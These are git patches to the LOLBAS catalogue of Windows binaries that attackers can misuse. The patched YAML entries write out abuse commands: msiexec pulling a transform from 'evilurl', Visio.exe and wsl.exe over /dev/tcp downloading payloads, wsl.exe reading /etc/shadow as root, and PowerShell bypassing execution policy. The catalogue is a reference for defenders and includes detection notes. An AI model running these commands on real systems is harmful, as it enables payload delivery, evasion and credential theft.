From 5d7ec48f4f86c1430a26292471efc4505e553abf Mon Sep 17 00:00:00 2001 From: Lino <123986259+L1-0@users.noreply.github.com> Date: Mon, 20 May 2024 22:49:27 +0200 Subject: [PATCH 1/8] Update Msiexec.yml (#377) Fixed spelling --- yml/OSBinaries/Msiexec.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/yml/OSBinaries/Msiexec.yml b/yml/OSBinaries/Msiexec.yml index 2e69f24..8eab24c 100644 --- a/yml/OSBinaries/Msiexec.yml +++ b/yml/OSBinaries/Msiexec.yml @@ -37,12 +37,12 @@ Commands: Tags: - Execute: DLL - Command: msiexec /i "https://trustedURL/signed.msi" TRANSFORMS="https://evilurl/evil.mst" /qb - Description: Installs the target .MSI file from a remote URL, the file can be signed by vendor. Additional to the file a Transformfile will be used, which can contains malicious code or binaries. The /qb will skip user input. - Usecase: Install trusted and signed msi file, with additional attack code as Treansorm file, from remote server + Description: Installs the target .MSI file from a remote URL, the file can be signed by vendor. Additional to the file a transformation file will be used, which can contains malicious code or binaries. The /qb will skip user input. + Usecase: Install trusted and signed msi file, with additional attack code as transformation file, from a remote server Category: Execute Privileges: User MitreID: T1218.007 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\msiexec.exe - Path: C:\Windows\SysWOW64\msiexec.exe From 91a3e80d8fad6f298c52429bafd13c562c10c971 Mon Sep 17 00:00:00 2001 From: Mozhar Alhosni Date: Thu, 23 May 2024 01:55:40 +0800 Subject: [PATCH 2/8] Update Csc.yml (#376) Co-authored-by: Wietze --- yml/OSBinaries/Csc.yml | 13 +++++-------- 1 file changed, 5 insertions(+), 8 deletions(-) diff --git a/yml/OSBinaries/Csc.yml b/yml/OSBinaries/Csc.yml index 945b584..6b8517c 100644 --- a/yml/OSBinaries/Csc.yml +++ b/yml/OSBinaries/Csc.yml @@ -1,18 +1,18 @@ --- Name: Csc.exe -Description: Binary file used by .NET to compile C# code +Description: Binary file used by .NET Framework to compile C# code Author: 'Oddvar Moe' Created: 2018-05-25 Commands: - - Command: csc.exe -out:My.exe File.cs - Description: Use CSC.EXE to compile C# code stored in File.cs and output the compiled version to My.exe. + - Command: csc.exe -out:Output.exe File.cs + Description: Use csc.exe to compile C# code, targeting the .NET Framework, stored in File.cs and output the compiled version to Output.exe. Usecase: Compile attacker code on system. Bypass defensive counter measures. Category: Compile Privileges: User MitreID: T1127 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: csc -target:library File.cs - Description: Use CSC.EXE to compile C# code stored in File.cs and output the compiled version to a dll file. + Description: Use csc.exe to compile C# code, targeting the .NET Framework, stored in File.cs and output the compiled version to a DLL file. Usecase: Compile attacker code on system. Bypass defensive counter measures. Category: Compile Privileges: User @@ -30,7 +30,4 @@ Detection: - Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml - IOC: Csc.exe should normally not run as System account unless it is used for development. Resources: - - Link: https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/command-line-building-with-csc-exe -Acknowledgement: - - Person: - Handle: + - Link: https://learn.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/ From 2185ade1f2f70750bbb1b1bc2754b954ac26f44c Mon Sep 17 00:00:00 2001 From: Borja Date: Wed, 22 May 2024 19:59:51 +0200 Subject: [PATCH 3/8] Update Msiexec.yml (#369) --- yml/OSBinaries/Msiexec.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/yml/OSBinaries/Msiexec.yml b/yml/OSBinaries/Msiexec.yml index 8eab24c..35a97e4 100644 --- a/yml/OSBinaries/Msiexec.yml +++ b/yml/OSBinaries/Msiexec.yml @@ -19,7 +19,7 @@ Commands: MitreID: T1218.007 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: msiexec /y "C:\folder\evil.dll" - Description: Calls DLLRegisterServer to register the target DLL. + Description: Calls DllRegisterServer to register the target DLL. Usecase: Execute dll files Category: Execute Privileges: User @@ -28,7 +28,7 @@ Commands: Tags: - Execute: DLL - Command: msiexec /z "C:\folder\evil.dll" - Description: Calls DLLUnregisterServer to un-register the target DLL. + Description: Calls DllUnregisterServer to un-register the target DLL. Usecase: Execute dll files Category: Execute Privileges: User From 78fa7b550e1ec045c8ed2b4920f5c1d9a20cbc00 Mon Sep 17 00:00:00 2001 From: Avihay Eldad <46644022+avihayeldad@users.noreply.github.com> Date: Thu, 23 May 2024 02:02:56 +0300 Subject: [PATCH 4/8] Add Winfile.yml (#374) Co-authored-by: Wietze --- yml/OtherMSBinaries/winfile.yml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 yml/OtherMSBinaries/winfile.yml diff --git a/yml/OtherMSBinaries/winfile.yml b/yml/OtherMSBinaries/winfile.yml new file mode 100644 index 0000000..f0171ed --- /dev/null +++ b/yml/OtherMSBinaries/winfile.yml @@ -0,0 +1,24 @@ +--- +Name: winfile.exe +Description: Windows File Manager executable +Author: Avihay Eldad +Created: 2024-04-30 +Commands: + - Command: winfile.exe calc.exe + Description: Execute an executable file with WinFile as a parent process. + Usecase: Performs execution of specified file, can be used as a defense evasion + Category: Execute + Privileges: User + MitreID: T1202 + OperatingSystem: Windows 10, Windows 11 +Full_Path: + - Path: C:\Windows\System32\winfile.exe + - Path: C:\Windows\winfile.exe + - Path: C:\Program Files\WinFile\winfile.exe + - Path: C:\Program Files (x86)\WinFile\winfile.exe + - Path: C:\Program Files\WindowsApps\Microsoft.WindowsFileManager_10.3.0.0_x64__8wekyb3d8bbwe\WinFile\winfile.exe +Resources: + - Link: https://github.com/microsoft/winfile +Acknowledgement: + - Person: Avihay Eldad + Handle: '@AvihayEldad' From 5d80e48159fce46992f0e45b471df1de990885d6 Mon Sep 17 00:00:00 2001 From: "Dr. Gerald Yaya" Date: Mon, 3 Jun 2024 17:52:55 +0100 Subject: [PATCH 5/8] Correct Winget.yml Spelling (#379) Corrected some spelling mistakes in the "Privileges" node of Winget.yml --- yml/OSBinaries/Winget.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OSBinaries/Winget.yml b/yml/OSBinaries/Winget.yml index cd2588d..d2629de 100644 --- a/yml/OSBinaries/Winget.yml +++ b/yml/OSBinaries/Winget.yml @@ -8,7 +8,7 @@ Commands: Description: 'Downloads a file from the web address specified in manifest.yml and executes it on the system. Local manifest setting must be enabled in winget for it to work: "winget settings --enable LocalManifestFiles"' Usecase: Download and execute an arbitrary file from the internet Category: Execute - Privileges: Local Aministrator - required to enabled local manifest setting + Privileges: Local Administrator - required to enable local manifest setting MitreID: T1105 OperatingSystem: Windows 10, Windows 11 Full_Path: From 622aaeed54dd596a763473fe3515aab4e95f1f40 Mon Sep 17 00:00:00 2001 From: bohops Date: Wed, 5 Jun 2024 18:17:34 -0400 Subject: [PATCH 6/8] Add Powershell.exe to Honorable Mentions (#363) --- yml/HonorableMentions/PowerShell.yml | 38 ++++++++++++++++++++++++++++ 1 file changed, 38 insertions(+) create mode 100644 yml/HonorableMentions/PowerShell.yml diff --git a/yml/HonorableMentions/PowerShell.yml b/yml/HonorableMentions/PowerShell.yml new file mode 100644 index 0000000..dfc3048 --- /dev/null +++ b/yml/HonorableMentions/PowerShell.yml @@ -0,0 +1,38 @@ +--- +Name: Powershell.exe +Description: Powershell.exe is a a task-based command-line shell built on .NET. +Author: 'Everyone' +Created: 2024-04-03 +Commands: + - Command: powershell.exe -ep bypass -file c:\path\to\a\script.ps1 + Description: Set the execution policy to bypass and execute a PowerShell script without warning + Usecase: Execute PowerShell cmdlets, .NET code, and just about anything else your heart desires + Category: Execute + Privileges: User + MitreID: T1059.001 + OperatingSystem: Windows 7 and up + - Command: powershell.exe -ep bypass -command "Invoke-AllTheThings..." + Description: Set the execution policy to bypass and execute a PowerShell command + Usecase: Execute PowerShell cmdlets, .NET code, and just about anything else your heart desires + Category: Execute + Privileges: User + MitreID: T1059.001 + OperatingSystem: Windows 7 and up + - Command: powershell.exe -ep bypass -ec IgBXAGUAIAA8ADMAIABMAE8ATABCAEEAUwAiAA== + Description: Set the execution policy to bypass and execute a very malicious PowerShell encoded command + Usecase: Execute PowerShell cmdlets, .NET code, and just about anything else your heart desires + Category: Execute + Privileges: User + MitreID: T1059.001 + OperatingSystem: Windows 7 and up +Full_Path: + - Path: '%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe' + - Path: '%SystemRoot%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe' +Detection: + - Sigma: https://github.com/SigmaHQ/sigma/tree/71ae004b32bb3c7fb04714f8a051fc8e5edda68c/rules/windows/powershell +Resources: + - Link: https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_powershell_exe?view=powershell-5.1 + - Link: https://attack.mitre.org/techniques/T1059/001/ +Acknowledgement: + - Person: Everyone + Handle: '@alltheoffensivecyberers' From 35148cc39eec3f250b765e2402d62f8a85f3279f Mon Sep 17 00:00:00 2001 From: Avihay Eldad <46644022+avihayeldad@users.noreply.github.com> Date: Thu, 6 Jun 2024 01:50:25 +0300 Subject: [PATCH 7/8] Add Visio.exe as a downloader (#356) Co-authored-by: Wietze --- yml/OtherMSBinaries/Visio.yml | 34 ++++++++++++++++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 yml/OtherMSBinaries/Visio.yml diff --git a/yml/OtherMSBinaries/Visio.yml b/yml/OtherMSBinaries/Visio.yml new file mode 100644 index 0000000..2c141e5 --- /dev/null +++ b/yml/OtherMSBinaries/Visio.yml @@ -0,0 +1,34 @@ +--- +Name: Visio.exe +Description: Microsoft Visio Executable +Author: Avihay Eldad +Created: 2024-02-15 +Commands: + - Command: Visio.exe https://example.com/payload + Description: Downloads payload from remote server + Usecase: It will download a remote payload and place it in INetCache. + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows + Tags: + - Download: INetCache +Full_Path: + - Path: C:\Program Files (x86)\Microsoft Office\Office14\Visio.exe + - Path: C:\Program Files\Microsoft Office\Office14\Visio.exe + - Path: C:\Program Files (x86)\Microsoft Office\Office15\Visio.exe + - Path: C:\Program Files\Microsoft Office\Office15\Visio.exe + - Path: C:\Program Files (x86)\Microsoft Office\Office16\Visio.exe + - Path: C:\Program Files\Microsoft Office\Office16\Visio.exe + - Path: C:\Program Files (x86)\Microsoft Office\root\Office14\Visio.exe + - Path: C:\Program Files\Microsoft Office\root\Office14\Visio.exe + - Path: C:\Program Files (x86)\Microsoft Office\root\Office15\Visio.exe + - Path: C:\Program Files\Microsoft Office\root\Office15\Visio.exe + - Path: C:\Program Files (x86)\Microsoft Office\root\Office16\Visio.exe + - Path: C:\Program Files\Microsoft Office\root\Office16\Visio.exe +Detection: + - IOC: URL on a visio.exe command line + - IOC: visio.exe making unexpected network connections or DNS requests +Acknowledgement: + - Person: Avihay Eldad + Handle: '@AvihayEldad' From 03b527b10539dacc793624210cbc2272f135b4ea Mon Sep 17 00:00:00 2001 From: unrooted Date: Fri, 7 Jun 2024 00:42:25 +0200 Subject: [PATCH 8/8] Update wsl.exe description (#378) Co-authored-by: Wietze --- yml/OtherMSBinaries/Wsl.yml | 22 ++++++++-------------- 1 file changed, 8 insertions(+), 14 deletions(-) diff --git a/yml/OtherMSBinaries/Wsl.yml b/yml/OtherMSBinaries/Wsl.yml index e1a5bda..e1493d1 100644 --- a/yml/OtherMSBinaries/Wsl.yml +++ b/yml/OtherMSBinaries/Wsl.yml @@ -10,35 +10,28 @@ Commands: Category: Execute Privileges: User MitreID: T1202 - OperatingSystem: Windows 10, Windows 19 Server + OperatingSystem: Windows 10, Windows Server 2019, Windows 11 - Command: wsl.exe -u root -e cat /etc/shadow Description: Cats /etc/shadow file as root Usecase: Performs execution of arbitrary Linux commands as root without need for password. Category: Execute Privileges: User MitreID: T1202 - OperatingSystem: Windows 10, Windows 19 Server - - Command: wsl.exe --exec bash -c 'cat file' - Description: Cats /etc/shadow file as root + OperatingSystem: Windows 10, Windows Server 2019, Windows 11 + - Command: wsl.exe --exec bash -c "" + Description: Executes Linux command (for example via bash) as the default user (unless stated otherwise using `-u `) on the default WSL distro (unless stated otherwise using `-d `) Usecase: Performs execution of arbitrary Linux commands. Category: Execute Privileges: User MitreID: T1202 - OperatingSystem: Windows 10, Windows 19 Server - - Command: wsl.exe --system calc.exe - Description: Execute the command as root - Usecase: Performs execution of arbitrary Linux commands as root without need for password. - Category: Execute - Privileges: User - MitreID: T1202 - OperatingSystem: Windows 11 + OperatingSystem: Windows 10, Windows Server 2019, Windows 11 - Command: wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary' Description: Downloads file from 192.168.1.10 Usecase: Download file Category: Download Privileges: User - MitreID: T1202 - OperatingSystem: Windows 10, Windows 19 Server + MitreID: T1105 + OperatingSystem: Windows 10, Windows Server 2019, Windows 11 Full_Path: - Path: C:\Windows\System32\wsl.exe Code_Sample: @@ -59,3 +52,4 @@ Acknowledgement: Handle: '@d1r4c' - Person: Nasreddine Bencherchali Handle: '@nas_bench' + - Person: Konrad 'unrooted' Klawikowski